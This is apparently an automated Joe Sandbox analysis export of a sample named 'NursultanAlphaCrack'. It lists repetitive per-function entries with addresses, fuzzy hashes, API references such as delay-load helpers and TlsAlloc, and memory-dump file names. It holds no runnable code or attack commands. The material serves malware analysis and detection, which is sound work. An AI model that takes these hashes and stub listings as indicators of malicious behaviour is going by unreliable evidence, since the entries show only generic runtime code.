Opcode Fuzzy Hash: eaf310d281594462eb37ccad36fa00e69206e8229b959cd8bd699de76f107416
Instruction Fuzzy Hash: C7F0BE3164520CBBCF126F61CC02CBEBFA1EF14B21B404169FD199A2A0DB715E21DB86

Function 001EADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 001EADEE

Strings

FlsAlloc, xrefs: 001EADC0, 001EADCA

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: bddbb97c1389157a6654c4b8e39f084bb360eaed114e9e5791c21185d79faba9
Instruction ID: b7b5e6373bcc9912ee28020ff21e854b93bedc23b457a49295060a793a7d969f
Opcode Fuzzy Hash: bddbb97c1389157a6654c4b8e39f084bb360eaed114e9e5791c21185d79faba9
Instruction Fuzzy Hash: 8EE0E531A4521C7BC711ABA6DC0297EBB98EF14B31B414199F90597290CFB16E81C6D6

Function 001DE1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 79cfb00ab5945ab49fb9ad11da68788af31caeb5576ccfd7e9aa56538d7de619
Instruction ID: 597db27682415b3b4ab63ecd7f867e0fe3d6d443623e6daac7664f4fb215560a
Opcode Fuzzy Hash: 79cfb00ab5945ab49fb9ad11da68788af31caeb5576ccfd7e9aa56538d7de619
Instruction Fuzzy Hash: AEB012D5368144BC310871892D02C37014CC0C1B22330C43FFC05C8580DA40BC102C71

Function 001DE1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 564ac8a4b59706f6d8ee7aba309f5136b370313d13d28c149b9d66d61e8d6c9e
Instruction ID: 9a4d1b2e89b419ad9ac5dad268b0d49172aff82edf776768391a7a3438d0e31a
Opcode Fuzzy Hash: 564ac8a4b59706f6d8ee7aba309f5136b370313d13d28c149b9d66d61e8d6c9e
Instruction Fuzzy Hash: 9DB012D2368044BC3108B2492D02C37018CC0C1B22330C03FFC09C8380DA40BC142871

Function 001DE1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 198457c63927fc9a6dfa78fd265de254db6e62e17912d8a99d285d56ce7f4be6
Instruction ID: 85f1e9951139f7930e335f6e3c76ea11c9f4daf751a276ff3f29514d8281a237
Opcode Fuzzy Hash: 198457c63927fc9a6dfa78fd265de254db6e62e17912d8a99d285d56ce7f4be6
Instruction Fuzzy Hash: 05B012D536C148BC3108B18D2D02C37018CC0C0B22330803FF809C8280DA407C102D71

Function 001DE21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 4e3ea25d5122a65c378d25069cb3e5ec50032186a1c2716e25a89d2fa670e24a
Instruction ID: be3d94b1dd464d1ca2e9ee796a0f99fe5b49cd25377a4af0e5bda8de16b99c12
Opcode Fuzzy Hash: 4e3ea25d5122a65c378d25069cb3e5ec50032186a1c2716e25a89d2fa670e24a
Instruction Fuzzy Hash: 0AB012E1368044BC3108B1492D02D37018CC0C1F32330C03FFD09C8280DA40BD102871

Function 001DE20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 8895401299a0c517f28c2249887c3e7d7f6310af39766a6c722e19aa21882ad9
Instruction ID: 5abc263c5fa9b0f19f29feb3b1316905af7753afa05237af86e2c23f09f0fd5e
Opcode Fuzzy Hash: 8895401299a0c517f28c2249887c3e7d7f6310af39766a6c722e19aa21882ad9
Instruction Fuzzy Hash: 78B012D2368044BC3108B2492E03C37018CC0C0B22330C03FF809C8380DE517D192871

Function 001DE200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 80c3394fcd9cd9833a2739c9e6ed7f1590de42956114aab3cb9af0d621224ee8
Instruction ID: f9355515cd43031f86ae49a35d0108fe12598b2ebf42aef3e866f22af026f641
Opcode Fuzzy Hash: 80c3394fcd9cd9833a2739c9e6ed7f1590de42956114aab3cb9af0d621224ee8
Instruction Fuzzy Hash: 34B012D2368184BC3148B2492D02C37018CC0C0B22330C13FF809C8380DA407C542871

Function 001DE23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 26d5b09059d5453a0944a4c046844f767fce2d23faa05944bb434b99de885ca8
Instruction ID: 13dec9bd8b78b88ac0f7d7c1cd2a2ed4adf56ffb53bfc07b18bd29c28c9d0b73
Opcode Fuzzy Hash: 26d5b09059d5453a0944a4c046844f767fce2d23faa05944bb434b99de885ca8
Instruction Fuzzy Hash: 32B012E1368044BC3108B14A2D02D37018CC0C0F32330803FF909C8280DA407D102871

Function 001DE232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: ab75535095bdfab0c3d8a9193e04675e5e1ebb918be3f467e71a0778adcb6c93
Instruction ID: a8027ec2422ff7b256bbac84bb969ffde4d46abd22fc4647b269a649439ce369
Opcode Fuzzy Hash: ab75535095bdfab0c3d8a9193e04675e5e1ebb918be3f467e71a0778adcb6c93
Instruction Fuzzy Hash: FAB012E1368044BC3108B1492E03D37018CC0C0F32330803FF909C8280DE417E112871

Function 001DE228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD, 001DE228

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: fa5fd2fea71e3b8e1edea9bd9528c81a0fc05aff4efb888841b0c16b4fb10d02
Instruction ID: 3bb4945b55221ae4dd0b7054f618f519bbb29116c8b10fc2d2e9dd0df215c9d4
Opcode Fuzzy Hash: fa5fd2fea71e3b8e1edea9bd9528c81a0fc05aff4efb888841b0c16b4fb10d02
Instruction Fuzzy Hash: B3B012E1368184BC3148B1492D02D37018CC0C0F32330813FF909C8280DA417D502871

Function 001DE250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: bebe642afdf4da37201691cdfe16d4e9d42895b7867a31a81c1a9d460a183890
Instruction ID: b7b5357cb4d582836436ea3d03926d034eb0bacc3e34bf538d134aa903446823
Opcode Fuzzy Hash: bebe642afdf4da37201691cdfe16d4e9d42895b7867a31a81c1a9d460a183890
Instruction Fuzzy Hash: 75B012E1369184BC3148B2492D02C37018DC0C0B22330813FF809CC280DA407C542871

Function 001DE246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 75d090b9bd19019965beddfbeb466d9751b0b11ebabe06d4d676ec2426488f6e
Instruction ID: 589389ace409259b134223b21311454213fbd8418689e0c67971dcd8fdfb1dec
Opcode Fuzzy Hash: 75d090b9bd19019965beddfbeb466d9751b0b11ebabe06d4d676ec2426488f6e
Instruction Fuzzy Hash: 97B012D1369084BC3108B1492D02C37018DC0C1B22330C03FFC09CC280DA40BC502871

Function 001DE26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: d653d84b1ba79445e06237fa82005a5c291a090e7d2e42b1abed40c33d0073f3
Instruction ID: bbe54fd096fb74cd0c38d554021b615869119f201021ef1849777433e9726073
Opcode Fuzzy Hash: d653d84b1ba79445e06237fa82005a5c291a090e7d2e42b1abed40c33d0073f3
Instruction Fuzzy Hash: DEB012D1368054BC3108B1592D02C3701CCC0C1B22330C03FFD09C8280DB80BC102C71

Function 001DE264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: e1b9ebae728807d07a06580ea80e39a30da8dec1a19140a6a643c736f05d09fc
Instruction ID: cbb3832405008f0291ea57ebb1afbdb5683dcc4d92b44c91070b302d547794ee
Opcode Fuzzy Hash: e1b9ebae728807d07a06580ea80e39a30da8dec1a19140a6a643c736f05d09fc
Instruction Fuzzy Hash: 65B012D1379084BC3108B1492D02C3701CDC4C0B22330803FF80ACC280DA407C102871

Function 001DE282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 54305b0e9df52929039a0fd2cdeced66e74c3fc2d3d84183f42166c258c2ec12
Instruction ID: 973c66d019e0ad971bbd2de4a6a0aec1aa0cbc75389e7c8508dd90f87534c61b
Opcode Fuzzy Hash: 54305b0e9df52929039a0fd2cdeced66e74c3fc2d3d84183f42166c258c2ec12
Instruction Fuzzy Hash: 91B012E1368054BC3108B1492E03C3701CCC0C0B22330803FF809C8280DE817D112C71

Function 001DE219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 0322425f58e16c974d8d5ad89f304c39774e831d56911a6819ec86fe4d3e510d
Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
Opcode Fuzzy Hash: 0322425f58e16c974d8d5ad89f304c39774e831d56911a6819ec86fe4d3e510d
Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1

Function 001DE25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

